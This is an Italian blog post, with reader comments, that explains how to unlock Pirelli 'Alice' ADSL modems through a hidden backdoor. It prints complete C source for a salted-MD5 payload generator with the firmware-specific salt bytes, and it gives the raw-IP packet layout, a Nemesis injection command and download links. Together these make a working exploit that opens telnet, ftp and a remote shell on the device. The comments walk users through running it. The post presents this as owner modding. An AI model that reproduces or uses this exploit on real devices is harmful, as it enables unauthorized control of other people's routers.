Sbloccare i modem Alice senza cacciaviti, seriali o ponticelli

Posted on novembre 25th, 2008 di admin

Questo articolo è dedicato allo sblocco dei modelli AGA/AGB/AG2P-AG3/AGPV-AGPF dei modem Alice mediante backdoor.

se volete essere seguiti passo per passo o volete la soluzione pronta contattatemi via mail (la trovate nella Home) e cercherò di aiutarvi.

Io e drPepperOne abbiamo scoperto una backdoor nei modem Alice a base Broadcom che permette in un solo colpo da LAN di abilitare telnet, ftp, tftp e modalità web estesa. Ciò che molti non sanno è che nei modem c’è un vero e proprio Sistema Operativo e che telnet implementa in questi casi una vera e propria shell remota da cui controllare l’intero sistema. Inoltre le interfacce web estese (credo tutte) presentano una pagina per cambiare firmware senza troppe difficoltà

Per abilitare la backdoor è sufficiente inviare un pacchetto IP opportunamente formattato al modem su cui c’è un socket raw in ascolto.


Tale pacchetto deve avere le seguenti caratteristiche:
  • protocollo IP
  • Protocol Number 255
  • lunghezza 28 byte (8 byte di payload)
  • il payload è costituito dai primi 8 byte dell’md5 con salt del mac del device br0


in questi modelli di modem br0 ha lo stesso mac di eth0 ed è quindi facile da reperire. Esso si potrebbe anche ottenere dai mac di eth1 e wl0 che sono più o meno consecutivi a seconda dei modelli dei modem. Su AGA per esempio mac(eth1)=mac(eth0)+1 e mac(wl0)=mac(eth0)+4.

L’algoritmo di creazione del payload è il seguente:


Così com’è il programma prevede che venga passato come parametro un file di 6 byte contenente il mac di br0.Il file compilato su WinXP lo travate al seguente link:
saxdax & drPepperOne

/* Alice Backdoor Pwd creator by saxdax */
/* this code generates an 8 byte hash to use as the paylod of the ip packet */
/* the mac must be in an hex file and has to be passed as argument to the program */

#include
#include
#include
#include “md5.h”

/*
* RFC 1321 compliant MD5 implementation
*
* Copyright (C) 2001-2003 Christophe Devine
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/

#define GET_UINT32(n,b,i) \
{ \
(n) = ( (uint32) (b)[(i) ] ) \
| ( (uint32) (b)[(i) + 1] << 8 ) \
| ( (uint32) (b)[(i) + 2] << 16 ) \
| ( (uint32) (b)[(i) + 3] << 24 ); \
}

#define PUT_UINT32(n,b,i) \
{ \
(b)[(i) ] = (uint8) ( (n) ); \
(b)[(i) + 1] = (uint8) ( (n) >> 8 ); \
(b)[(i) + 2] = (uint8) ( (n) >> 16 ); \
(b)[(i) + 3] = (uint8) ( (n) >> 24 ); \
}

void md5_starts( md5_context *ctx )
{
ctx->total[0] = 0;
ctx->total[1] = 0;

ctx->state[0] = 0×67452301;
ctx->state[1] = 0xEFCDAB89;
ctx->state[2] = 0×98BADCFE;
ctx->state[3] = 0×10325476;
}

void md5_process( md5_context *ctx, uint8 data[64] )
{
uint32 X[16], A, B, C, D;

GET_UINT32( X[0], data, 0 );
GET_UINT32( X[1], data, 4 );
GET_UINT32( X[2], data, 8 );
GET_UINT32( X[3], data, 12 );
GET_UINT32( X[4], data, 16 );
GET_UINT32( X[5], data, 20 );
GET_UINT32( X[6], data, 24 );
GET_UINT32( X[7], data, 28 );
GET_UINT32( X[8], data, 32 );
GET_UINT32( X[9], data, 36 );
GET_UINT32( X[10], data, 40 );
GET_UINT32( X[11], data, 44 );
GET_UINT32( X[12], data, 48 );
GET_UINT32( X[13], data, 52 );
GET_UINT32( X[14], data, 56 );
GET_UINT32( X[15], data, 60 );

#define S(x,n) ((x << n) | ((x & 0xFFFFFFFF) >> (32 – n)))

#define P(a,b,c,d,k,s,t) \
{ \
a += F(b,c,d) + X[k] + t; a = S(a,s) + b; \
}

A = ctx->state[0];
B = ctx->state[1];
C = ctx->state[2];
D = ctx->state[3];

#define F(x,y,z) (z ^ (x & (y ^ z)))

P( A, B, C, D, 0, 7, 0xD76AA478 );
P( D, A, B, C, 1, 12, 0xE8C7B756 );
P( C, D, A, B, 2, 17, 0×242070DB );
P( B, C, D, A, 3, 22, 0xC1BDCEEE );
P( A, B, C, D, 4, 7, 0xF57C0FAF );
P( D, A, B, C, 5, 12, 0×4787C62A );
P( C, D, A, B, 6, 17, 0xA8304613 );
P( B, C, D, A, 7, 22, 0xFD469501 );
P( A, B, C, D, 8, 7, 0×698098D8 );
P( D, A, B, C, 9, 12, 0×8B44F7AF );
P( C, D, A, B, 10, 17, 0xFFFF5BB1 );
P( B, C, D, A, 11, 22, 0×895CD7BE );
P( A, B, C, D, 12, 7, 0×6B901122 );
P( D, A, B, C, 13, 12, 0xFD987193 );
P( C, D, A, B, 14, 17, 0xA679438E );
P( B, C, D, A, 15, 22, 0×49B40821 );

#undef F

#define F(x,y,z) (y ^ (z & (x ^ y)))

P( A, B, C, D, 1, 5, 0xF61E2562 );
P( D, A, B, C, 6, 9, 0xC040B340 );
P( C, D, A, B, 11, 14, 0×265E5A51 );
P( B, C, D, A, 0, 20, 0xE9B6C7AA );
P( A, B, C, D, 5, 5, 0xD62F105D );
P( D, A, B, C, 10, 9, 0×02441453 );
P( C, D, A, B, 15, 14, 0xD8A1E681 );
P( B, C, D, A, 4, 20, 0xE7D3FBC8 );
P( A, B, C, D, 9, 5, 0×21E1CDE6 );
P( D, A, B, C, 14, 9, 0xC33707D6 );
P( C, D, A, B, 3, 14, 0xF4D50D87 );
P( B, C, D, A, 8, 20, 0×455A14ED );
P( A, B, C, D, 13, 5, 0xA9E3E905 );
P( D, A, B, C, 2, 9, 0xFCEFA3F8 );
P( C, D, A, B, 7, 14, 0×676F02D9 );
P( B, C, D, A, 12, 20, 0×8D2A4C8A );

#undef F

#define F(x,y,z) (x ^ y ^ z)

P( A, B, C, D, 5, 4, 0xFFFA3942 );
P( D, A, B, C, 8, 11, 0×8771F681 );
P( C, D, A, B, 11, 16, 0×6D9D6122 );
P( B, C, D, A, 14, 23, 0xFDE5380C );
P( A, B, C, D, 1, 4, 0xA4BEEA44 );
P( D, A, B, C, 4, 11, 0×4BDECFA9 );
P( C, D, A, B, 7, 16, 0xF6BB4B60 );
P( B, C, D, A, 10, 23, 0xBEBFBC70 );
P( A, B, C, D, 13, 4, 0×289B7EC6 );
P( D, A, B, C, 0, 11, 0xEAA127FA );
P( C, D, A, B, 3, 16, 0xD4EF3085 );
P( B, C, D, A, 6, 23, 0×04881D05 );
P( A, B, C, D, 9, 4, 0xD9D4D039 );
P( D, A, B, C, 12, 11, 0xE6DB99E5 );
P( C, D, A, B, 15, 16, 0×1FA27CF8 );
P( B, C, D, A, 2, 23, 0xC4AC5665 );

#undef F

#define F(x,y,z) (y ^ (x | ~z))

P( A, B, C, D, 0, 6, 0xF4292244 );
P( D, A, B, C, 7, 10, 0×432AFF97 );
P( C, D, A, B, 14, 15, 0xAB9423A7 );
P( B, C, D, A, 5, 21, 0xFC93A039 );
P( A, B, C, D, 12, 6, 0×655B59C3 );
P( D, A, B, C, 3, 10, 0×8F0CCC92 );
P( C, D, A, B, 10, 15, 0xFFEFF47D );
P( B, C, D, A, 1, 21, 0×85845DD1 );
P( A, B, C, D, 8, 6, 0×6FA87E4F );
P( D, A, B, C, 15, 10, 0xFE2CE6E0 );
P( C, D, A, B, 6, 15, 0xA3014314 );
P( B, C, D, A, 13, 21, 0×4E0811A1 );
P( A, B, C, D, 4, 6, 0xF7537E82 );
P( D, A, B, C, 11, 10, 0xBD3AF235 );
P( C, D, A, B, 2, 15, 0×2AD7D2BB );
P( B, C, D, A, 9, 21, 0xEB86D391 );

#undef F

ctx->state[0] += A;
ctx->state[1] += B;
ctx->state[2] += C;
ctx->state[3] += D;
}

void md5_update( md5_context *ctx, uint8 *input, uint32 length )
{
uint32 left, fill;

if( ! length ) return;

left = ctx->total[0] & 0×3F;
fill = 64 – left;

ctx->total[0] += length;
ctx->total[0] &= 0xFFFFFFFF;

if( ctx->total[0] < length )
ctx->total[1]++;

if( left && length >= fill )
{
memcpy( (void *) (ctx->buffer + left),
(void *) input, fill );
md5_process( ctx, ctx->buffer );
length -= fill;
input += fill;
left = 0;
}

while( length >= 64 )
{
md5_process( ctx, input );
length -= 64;
input += 64;
}

if( length )
{
memcpy( (void *) (ctx->buffer + left),
(void *) input, length );
}
}

static uint8 md5_padding[64] =
{
0×80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
};

void md5_finish( md5_context *ctx, uint8 digest[16] )
{
uint32 last, padn;
uint32 high, low;
uint8 msglen[8];

high = ( ctx->total[0] >> 29 )
| ( ctx->total[1] << 3 );
low = ( ctx->total[0] << 3 );

PUT_UINT32( low, msglen, 0 );
PUT_UINT32( high, msglen, 4 );

//for(int i=0;i<8;i++) printf(”length %d\n”,msglen[i]);

last = ctx->total[0] & 0×3F;
padn = ( last < 56 ) ? ( 56 – last ) : ( 120 – last );

md5_update( ctx, md5_padding, padn );
md5_update( ctx, msglen, 8 );

PUT_UINT32( ctx->state[0], digest, 0 );
PUT_UINT32( ctx->state[1], digest, 4 );
PUT_UINT32( ctx->state[2], digest, 8 );
PUT_UINT32( ctx->state[3], digest, 12 );
}

//#ifdef TEST

/*
* those are the standard RFC 1321 test vectors
*/

static char *msg[] =
{
“”,
“a”,
“abc”,
“message digest”,
“abcdefghijklmnopqrstuvwxyz”,
“ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789″,
“12345678901234567890123456789012345678901234567890123456789012″ \
“345678901234567890″
};

static char *val[] =
{
“d41d8cd98f00b204e9800998ecf8427e”,
“0cc175b9c0f1b6a831c399e269772661″,
“900150983cd24fb0d6963f7d28e17f72″,
“f96b697d7cb7938d525a2f31aaf161d0″,
“c3fcd3d76192e4007dfb496cca67e13b”,
“d174ab98d277d9f5a5611c2c9f419d9f”,
“57edf4a22be3c955ac49da2e2107b67a”
};

//Salt per AGA/AGB/AG3(Vela)
static char saltOrig[] =
{0×04, 0×07, 0×67, 0×10, 0×02, 0×81, 0xFA, 0×66, 0×11, 0×41, 0×68, 0×11, 0×17, 0×01, 0×05, 0×22, 0×71, 0×04, 0×10, 0×33};
//Salt per AGPV/AGPF
//static char saltOrig[] =
//{0×43, 0×22, 0×11, 0×11, 0×22, 0×81, 0xFA, 0×65, 0×11, 0×41, 0×54, 0×11, 0×17, 0×12, 0×15, 0×22, 0×72, 0×03, 0×10, 0×66};

int main( int argc, char *argv[] )
{
FILE *f;
int i, j;
char output[33];
md5_context ctx;
unsigned char buf[1000];
unsigned char md5sum[16];
unsigned char salt[20];

printf( “****************************\n”);
printf( “Alice BackDoor hash creator \n”);
printf( “by saxdax and drPepperOne \n”);
printf( “****************************\n\n”);

if( argc < 2 )
{
printf( “\n Usage: %s pathfileMAC\n\n”, argv[0] );
return 0;
}

if( ! ( f = fopen( argv[1], “rb” ) ) )
{
perror( “fopen” );
return( 1 );
}

md5_starts( &ctx );

while( ( i = fread( buf, 1, sizeof( buf ), f ) ) > 0 )
{
md5_update( &ctx, buf, i );
}

memcpy(salt, saltOrig, 20);

md5_update( &ctx, salt, 20 );

md5_finish( &ctx, md5sum );

printf(”Payload is: “);
for( j = 0; j < 8; j++ )
{
printf( “%02x”, md5sum[j] );
}

return( 0 );
}

 

AGA/AGB/AG3 http://rapidshare.com/files/153439269/AliceBDhashCreator.zip.html
AGPV/AGPF http://rapidshare.com/files/156053651/md5_AGPV_AGPF.exe.html

Tali programmi sono validi fino alle seguenti versioni di firmware:

AG2P: 3.1.0
AG3: 3.2.4
AGA: 3.2.4
AGB: 3.2.4
AGPF: AGPF_4.3.4.0001 (e la 4.4.0)
AGPV: 4.3.1

Il programma deve essere lanciato da linea di comando e restituisce a video gli 8 byte del payload.

A questo punto potete utilizzare qualsiasi strumento di injection preferiate.

Io ho utilizzato Colasoft Packet Builder, generatore visuale con GUI su Windows.

Allego il template di un pacchetto già pronto in cui cambiare solo IP del modem e del pc, mac del modem e del pc e payload (nalla parte in basso a sinistra esadecimale di colasoft PB):

http://www.megaupload.com/?d=8OH6NFX1

posizione payload

posizione payload

drPepperOne ha utilizzato Nemesis da linea di comando, disponibile per Linux e Windows.

Una volta creato un file di 8 byte con un editor esadecimale, con nome per es. hash.hex, la sintassi da usare con Nemesys è:

Code: nemesis ip -D 192.168.1.1 -p 255 -P hash.hex

Se il pacchetto è corretto il router risponderà con un pacchetto ICMP con codici 3 e 2 (protocol unreachable).

A questo punto potete collegarvi a telnet, ftp e tftp ed utilizzare l’interfaccia web estesa senza aver aperto il modem!

Buon divertimento.

Tags: modem Alice // 356 Comments »

356 Responses to “Sbloccare i modem Alice senza cacciaviti, seriali o ponticelli”

  1. luca da vr // mar 4, 2009 at 03:47

    Ciao ho seguito al passo la tua guida..mi dice IP Packet Injected ma se eseguo telnet 192.168.1.1 mi dice:
    Trying 192.168.1.1…
    telnet: Unable to connect to remote host: Connection refused

    Cosa ho sbagliato???inoltre non riesco a capire come farei ad avere un payload di 8 byte…ho guardato sulle propriet’ del file e segna 16B…
    Aspetto un vostro aiuto…!
    Grazie mille!!!

  2. admin // mar 4, 2009 at 14:32

    evidentemente hai usato un editor di testo anzichè un editor esadecimale.
    il file con il mac dev’essere di 6 byte e il file con il payload di 8 byte.

  3. pertecara // apr 9, 2009 at 11:31

    Ciao e un ringraziamento anticipato per il tuo ottimo lavoro.

    Ti allego il testo di un mio messaggio immesso nel Forum de ilpuntotecnicoeadsl.com al quale purtroppo non è seguita una risposta.
    Spero tu possa aiutarmi.

    Ho un AGA al quale ho sostituito il firmware originale con quello chiamato AGW2-PLUS_flash_image_8MB.w (Pirelli)
    La procedura non ha avuto particolari problemi.
    Una volta messe in corto le due famose piazzole segnate in rosso, ho riacceso il router, il led del Power s’è acceso in rosso ecc. ecc.

    Dopo qualche giorno di prove, mi sono deciso a sostiture il firmware con quello chiamato USRAGW2-PLUS_fs_kernel_3.04L.01.-090315_1900, penso più adatto alle mie esigenze (non ho Alice Flat) cercando di passare prima da AGW2-PLUS_psi_clear.

    Ma qui mi sono bloccato.

    Ho provato e riprovato non meno di 100 volte a ripetere la procedura del ponticello sulle due famose piazzole ma…

    Niente da fare!
    Ho provato anche a saldarci due fili in rame per essere sicuro di aver fatto il corto…

    Il led power si accende sempre regolarmente in verde e il router si avvia normalmente e me lo ritrovo come sempre all’indirizzo 192.168.1.1 (o 192.168.1.1/main.html se voglio andare nel menu Pirelli).

    Alla fine non sapendo cosa fare, e non trovando altra via, sono andato nella pagina di aggiornamento del firmware Pirelli per fare l’upload di AGW2-PLUS_psi_clear.

    Appena terminato l’upload il router s’è riavviato come previsto ma adesso è irraggiungibile dal consueto indirizzo e come sempre non riesco a riavviarlo con la procedura del ponticello.

    Ho successivamente provato questa tua procedura ma non succede niente e il router resta irraggiungibile sia in Telnet che in http.
    Penso che tutto dipenda dal psi_clear che ha piallato tutto nella flash…

    Che faccio adesso?

    Devo ricorrere alla JTAG?
    Semmai quale tipo?
    Quella semplice che ha le sole resistenze è sufficiente?
    Eventualmente lo schema di connessione verso l’interfaccia a 14 pin nella piastra dell’AGA?
    Ti descrivo il tipo del mio Alice Gate voip 2 Plus Wi-Fi:
    la flash montata è la MX29LV640DTTC-90G
    L’etichetta hardware dice: IO1L011 REV. 3 GP

    Grazie infinite per l’aiuto.

  4. admin // apr 9, 2009 at 11:45

    Ciao Pertecara,

    il mio metodo si applica solo ai firmware Pirelli. Non funziona se intanto lo hai sovrascritto con uno USRobotics.
    Nel tuo caso credo proprio che l’unico metodo per sperare di recuperare il modem sia tramite JTAG.
    Non sono ancora esperto di JTAG e seriali (motivo per cui cerco tutti i modi possibili di sbloccare i modem via software) e quindi ti rimando agli esperti sul forum da te indicato.

    Buona fortuna

  5. Tuttokekko // mag 14, 2009 at 22:21

    Grandissimo tutorial
    Non ho ancora provato la procedura perchè ho una domanda.
    E’ possibile tornare indietro e riportare lo stato come da mamma Telecom dato che mi hanno detto che se per caso lo devo sostituire se è manomesso me lo fanno ripagare?
    Grazie.

  6. Tuttokekko // mag 14, 2009 at 23:23

    Scusa. Sempre io.
    Ma con i firmware attuali funziona ancora?
    Io ho l’AGPF_4.3.5 e facendo la procedura non succede assolutamente nulla.
    I file sono creati alla perfezione, il comando nemesis mi da la conferma, ma nulla cambia.
    Ciao e grazie anticipatamente.

  7. admin // mag 14, 2009 at 23:48

    @Tuttokekko

    lo sblocco con questo metodo permette di ottenere l’accesso ad una sezione nascosta già presente nel firmware originale. Equivale a modificare solo due righe del file di configurazione.

    Si può tornare indietro in due modi.
    1) Reimpostando opportunamente il file di configurazione.
    2) resettando via hardware il modem (per l’agpf basta tenere premuto 20 secondi durante l’accensione il tasto di reset)

    Per quanto riguarda la seconda domanda, il codice pubblicato per AGPF funziona finon alla versione 4.3.3 (e anche per 4.4.0). Per le 4.3.4 e 4.3.5 cambia il payload. NOn ho pubblicato il codice per questi ultimi anche se esiste.

    Ciao

  8. Francesco // mag 20, 2009 at 16:35

    Complimenti per la guida, ma nel mio caso non pare funzionare. Sicuramente sbaglio qualcosa, dal momento che non sono espertissimo.
    Il mio è un Alice Gate 2 Plus (non wifi), l’etichetta sotto dice Alice Business Gate 2 Plus, e dalla pagina principale del router leggo che ha software AGB_3.2.4.
    Seguita la procedura, creato il file del MAC address con un editor hex (6 byte), copiato il risultato del software del primo link in un nuovo file hex da 8 byte. Inviato il pacchetto con nemesis, ottengo “IP packet injected”, e pare non essere cambiato nulla.
    Premetto che subito dopo ho provato ad entrare in ftp semplicemente digitando in IE8 (ma anche Chrome) ftp://192.168.1.1. Scusate l’ignoranza, non so se questo è sufficiente.

    Idee? Consigli? Insulti?

  9. Francesco // mag 20, 2009 at 16:38

    Una precisazione: il MAC address che ho inserito nel file hex di 6 byte è quello che trovo sull’etichetta posta sotto il router. Se non ho capito male è quello da inserire… o no?

  10. admin // mag 21, 2009 at 00:24

    Ciao Francesco,

    il mac è quello stampato sotto il modem.
    La procedura sembra corretta.
    E’ importantissimo killare momentaneamente qualsiasi firewall o antivirus installati sul pc.
    E’ importante eseguire la procedura via cavo; l’invio di pacchetti (injection) in wifi è un po’ più delicato.
    Per conferma sulla correttezza del payload mandami il mac per email.
    In alternativa prova con Colasoft Packet Builder.

    Ciao

  11. admin // mag 22, 2009 at 22:27

    Giusto per rispondere, Franceso ha risolto usando Colasoft Packet Builder.

    Ciao

  12. Fabry // mag 31, 2009 at 14:45

    Poichè nemesis non funziona a causa di problemi con la packet.dll potresti spiegarmi come utilizzare il payload con Colasoft Packet Builder? Grazie!

  13. admin // mag 31, 2009 at 18:28

    il payload di 8 byte va scritto nella parte sinistra in basso di colasoft Packet Builder. Per intenderci la parte esadecimale e non testuale.
    Per verificare la correttezza dell’operazione alla fine dovresti trovarti una dimensione di 28 byte.

  14. Fabry // giu 2, 2009 at 11:51

    Scusa se ti riscrivo… potresti mandarmi un esempio, anche per posta, di come creare il pacchetto ip da inviare? Purtroppo qualunque tipo di pacchetto io crea e per come lo modifico non riesco ad ottenere i 28byte.
    Oltretutto anche risolvendo i problemi di dll con nemesis ottengo il seguente messaggio di errore: “Unable to retrieve the list of the adapters!
    failed to select device
    ERROR: Unable to open raw socket for packet injection: .
    You may need Administrator privileges to use nemesis.

    IP Injection Failure”

    Grazie.

  15. admin // giu 2, 2009 at 15:11

    ti ho mandato un template del pacchetto da inviare con colasoft PB in cui cambiare solo i dati necessari: IP tuo e del modem, mac tuo e del modem, payload.

    Ciao

  16. Fabry // giu 2, 2009 at 17:15

    Sei un grande!!! Grazie infinite!!!

  17. fabio // giu 2, 2009 at 18:37

    printf( “****************************\n”);
    printf( “Alice BackDoor hash creator \n”);
    printf( “by saxdax and drPepperOne \n”);
    printf( “****************************\n\n”);

    if( argc < 2 )
    {
    printf( “\n Usage: %s pathfileMAC\n\n”, argv[0] );
    return 0;
    }

    A ME CAPITA QUESTO, CIOè RICHEDE IL PATHFILEMAC MA NN SO COSA SIA, PENSAVO FOSSE L’INDIRIZZO MAC, MA MI DA ERRORE…

  18. admin // giu 2, 2009 at 23:57

    @fabio

    quello che viene richiesto è il percorso completo di nome (path appunto) in cui si trova il file di 6 byte contenente il mac (creato con editor esadecimale).

  19. fabio // giu 3, 2009 at 12:14

    sn in windows, collego il router (firmware 4.3.2) a power, lan e adsl, accendo il router, scrivo il file esadecimale del mac address e creo il payload con la backdoor scaricata; poi prendo il payload e lo riscrivo sottoforma esadecimale, il risultato lo copio nella parte in basso a sinistra del programma colasoft;(per poter sciverlo in basso a sinistra, premo in colasoft ADD- IP PACKET, cancello quello che c’era scritto e metto il mio payload); ovviamente sorgente e destinatario non sono ne il mio pc ne il router, credo sia normale, comunque ovviamente premo SENT e quando invio non succede proprio nulla, neanke un messaggio, niente di niente….ho sbagliato qualksa vero?

  20. fabio // giu 4, 2009 at 11:15

    il metodo della “wiki” non ha dato i frutti sperati, adesso riprovo il tuo (PERO’ SE QUALKUNO HA GIA RICEVUTO DA SAXDAX UN TEMPLATE DEL PACCHETTO DA INVIARE CON COLASOFT ME LO INVII [TIPO FABRY...] ). se non iresco a sbloccarlo ancora, allora proverò a ponticellare §_§

    Fatemi sapere e vi farò sapere ^_^

  21. admin // giu 4, 2009 at 22:32

    nell’articolo ho aggiunto il template di un pacchetto già pronto per Colasoft Packet Builder.

    Ora non potete più sbagliare :)

  22. fabio // giu 7, 2009 at 08:37

    niente…devo provare per forza a ponticellare.
    Il template era giusto e l’ho mandato piu e piu volte (ho killato sia avast ke firewall di windows). Ho provato ad entrare in telnet ma niente.
    A e devo anche dire che il metodo della wiki nn ha dato i suoi frutti

    Secondo me è il mio tipo di modem ke nn va bene perchè è il tipo business oppure perchè ho l’agpf 4.3.2
    a ma mika dovevo installare il cd di alice prima….=)….sn proprio disperato

  23. andry // giu 24, 2009 at 17:47

    Ciao! Ma questa guida serve principalmente ad avere accesso telnet? L’interfaccia web estesa dopo la procedura in che pagina si troverà? L’accesso telnet serve principalmente per modificare i valori snr? Se si utilizza questa procedura bisogna disattivare la Telegestione? come?

    Grazie in anticipo :)

  24. ioenopio // giu 28, 2009 at 13:12

    ciao saxdax,
    ho trovato in un sito un eseguibile ch sembri automatizzare tutte le tue procedure.io non l’ho provato per precauzione, ma a te risulta che funzioni?
    http://www.evilsocket.net/sources/alicefuck.sh.txt

    grazie

  25. admin // giu 28, 2009 at 17:44

    @ioenopio

    quella è la traduzione in script bash del mio algoritmo. Funziona su linux a patto di avere installato nemesis e qualcos’altro.

    Ci sono tuttavia anche degli eseguibili per linux ancora più compatti sul thread dedicato alla mia procedura di sblocco su http://www.ilpuntotecnicoeadsl.com.

    Ciao

  26. c4nc // lug 22, 2009 at 16:58

    Ciao a tutti, avendo un router alice gate 2 plus wifi con software AGIA_1.2.0, la procedura descritta funziona? o il payload che viene generato non vale per questo firmware? Ho provato in tutti i modi la procedura (sia linx che windows) ma senza alcun risultato…..

  27. admin // lug 22, 2009 at 17:06

    @c4nc

    no. la procedura funziona solo sui modem Pirelli Alice elencati nell’articolo.
    L’AGIA è delle Industrie Dialface.

    Ci sono altri metodi di sblocco per questo.

    Vedi su http://www.ilpuntotecnicoeadsl.com/forum per maggiori info

    Ciao

  28. alex77 // ago 5, 2009 at 15:41

    Ho testato su un vecchio modem alice gate 2 wifi plus del 2005 e funziona alla perfezione (sotto linux ho usato come editor esadecimale Ghex2 e nemesis per fare l’injection del pacchetto IP). Oltre all’accesso via web alle funzionalità estese (http://192.168.1.1/main.html) e tramite telnet mi piacerebbe far funzionare l’ssh ma anche se risulta abilitato non funziona. Anche il forward delle richieste dns non va. Il firmware esistente non mi pare un granché. A questo punto ha senso caricarci tramite la funzionalità di upload da interfaccia gui un firmware più recente di quelli supportati da questa procedura e se si, dove potrei reperirlo? Grazie intanto per lo splendido lavoro che mi ha consentito di risparmiare i soldi di un nuovo modem essendo passato a infostrada dopo l’iniziativa truffa di telecom (http://notinmylivingroom.blogspot.com)
    ciao!

  29. Rytx // ago 9, 2009 at 22:52

    Ciao, ho letto il tuo topic e mi sono incuriosito. PRima di tutto voglio farvi i complimenti.

    Volevo sapere se il metodo elencato può funzionare con AGPF_4.3.5a ? Preservo le funzioni dell’Alice TV (digitale terreste e televisione via cavo) ? Rimangono le funzioni del VOIP ?

    Ogni qual volta che la telecom fa un aggiornamento del firmware devo rifare tutta la procedura?

    Sono intresssato solo perchè voglio configurare il gateway del router. Grazie mille aspetto una risposta ^^

  30. admin // ago 9, 2009 at 23:50

    @alex77

    sono contento di esserti stato utile. Per le opzioni possibili su questi modem ti rimando al forum http://www.ilpuntotecnicoeadsl.com/forum.
    Troverai tanti spunti interessanti.

    @Rytx
    Per quanto riguarda l’AGPF 4.3.5a non ho ancora avuto modo di testare. Comunque già per il 4.3.5 il tool di creazione del payload non è pubblicato (anche se esiste).
    Ti farò sapere.
    Per quanto riguarda le funzionalità telecom, il metodo in questione non è per niente invasivo e mantiene tutte le funzionalità del gestore.

    A presto

  31. Rytx // ago 10, 2009 at 20:57

    Ciao grazie della risposta celere, sai per caso se esiste un modo per tornare al firmware precedente per poter applicare lo “sblocco” ?

    grazie

  32. admin // ago 10, 2009 at 23:16

    se per “tornare al firmware precedente” intendi disattivare gli effetti dello sblocco, allora devi selezionare il “restore default settings” da interfaccia avanzata o da telnet.

    Ciao

  33. spino // ago 20, 2009 at 01:26

    ciao, complimenti per l’ottima guida!!
    Potresti, quando avrai tempo, pubblicare le specifiche per il firmware del pirelli wi-fi AGPF_4.3.5a?
    Con la versione AGPF_4.3.5 era possibile entrare nel SO del router, adesso non c’è versi.
    Te ne sarei (saremo, visto che il firmware si aggiorna automaticamente e molti sono nella mia condizione) grato.

    Ultima domanda: siccome il pirelli aggiorna il firmware in automatico, c’è modo di bloccare questo processo?

    Grazie ancora

    Spino

  34. Xenon87 // ago 30, 2009 at 20:10

    Salve, avrei bisogno del template per il pacchetto per Colasoft Packet Builder, ma il link non va perché il sito dice che è stato raggiunto il limite dei download per quel file.

    Qualcuno potrebbe gentilmente creare un link per megaupload o inviarmi quel template per favore?

    Grazie e arrivederci!

  35. mavelot // set 17, 2009 at 11:21

    Ciao,
    mi potresti chiarire “Per quanto riguarda l’AGPF 4.3.5a non ho ancora avuto modo di testare. Comunque già per il 4.3.5 il tool di creazione del payload non è pubblicato (anche se esiste).”

    In che senso non è pubblicato…da chi ??
    Cerchiamo di darci una mano per “procurarcelo” !
    Ciao,
    Marco

  36. admin // set 17, 2009 at 12:06

    Ciao mavelot,

    ovviamente IO non ho pubblicato per motivi già esposti. Ci sarebbe una corsa continua tra me e gli sviluppatori telecom/pirelli che non mi va di cominciare.

    Ciao

  37. mavelot // set 17, 2009 at 14:05

    Ciao,
    ti ringrazio per la sollecita risposta.

    Peccato che non ho le necessarie conoscenze per fare il reverse engeenering che hai fatto tu….
    Spero solo che quando proverò i firmware successivi, si riesca almeno ad abilitare il tutto da console…anche se non è escluso che abbiano inibilto anche quella
    Ciao

  38. winder65 // set 19, 2009 at 09:44

    ciao, a me quando uso nemesis mi spunta come errore questa scritta “impossibile trovare il punto di ingresso PacketGetNetInfo della procedura nella libreria di collegamento dinamico packet.dll
    ti ringrazio anticipatamente fammi sapere ciao.

  39. mauzza // set 23, 2009 at 20:39

    Ciao a tutti, qualcuno che ha scaricato il template per Colasoft potrebbe x favore renderlo disponibile (il link su rapidshare da errore) e non sono certo di aver fatto tutto bene nella costruzione del pacchetto … infatti non funziona.
    Ho AGPF_4.5.0 e sto usando algoritmo di creazione payload che mi sembra generico (per tutti le versioni di firmware ??) infati genera payload diverso da quello linkato in discussione. Grazie ciao

  40. mauzza // set 24, 2009 at 00:00

    ciao, trascurate la richiesta precedente. Ho trovato il template in altro forum e ho capito che la causa del non funzionamento è la versione del fw grazie

  41. alix // set 24, 2009 at 09:52

    potresti dire su che forum o incollare un link al template per favore.. ? grazie

  42. mauzza // set 24, 2009 at 19:45

    il template si può trovare su forum legati allo sblocco delle del modem/router su http://www.ilpuntotecnicoeadsl.com.
    mini guida a Colasoft visto che ho fatto diverse prove:
    1) add packet
    2) scegliere tipo IP
    3) cambiare i valori:
    Destination address: MAC modem (separati da :)
    Source address: MAC scheda rete (separato da :)
    Total Lenght: impostare 28
    Protocol: 255
    Source IP: IP scheda rete
    Destination IP: IP modem
    Number of Bytes: selezionare la voce e nell’editor hex cancellare i vaolri e inseire gli 8byte del payload
    4) selezionare il pacchetto con click dx Send
    spero di esserti stato d’aiuto, ciao

  43. Lucchino // ott 8, 2009 at 22:11

    Ciao ragazzi ho appena seguito la procedura a puntino tentando di sbloccare ALICE GATE VoIP 2 Plus Wifi con firmare versione 4.3.5a.Faccio tutto con windows:Creo il file da 8Byte(contenente il payload) con un editor esadecimale.Poi da linux inietto il pacchetto nel router tramite nemesis.
    Alla fine della procedura mi dice “IP PACKET INJECTED”, quindi tutto sembra essere andato a buon fine,ma in realtà nel router non si è attivato il menu avanzato segreto…
    Avete qualche consiglio?
    Cosa ho sbagliato secondo voi?
    Qualcuno può aiutarmi?Grazie mille

  44. admin // ott 8, 2009 at 22:35

    semplicemente non hai letto la parte in cui dico:

    “Tali programmi sono validi fino alle seguenti versioni di firmware:” etc etc.

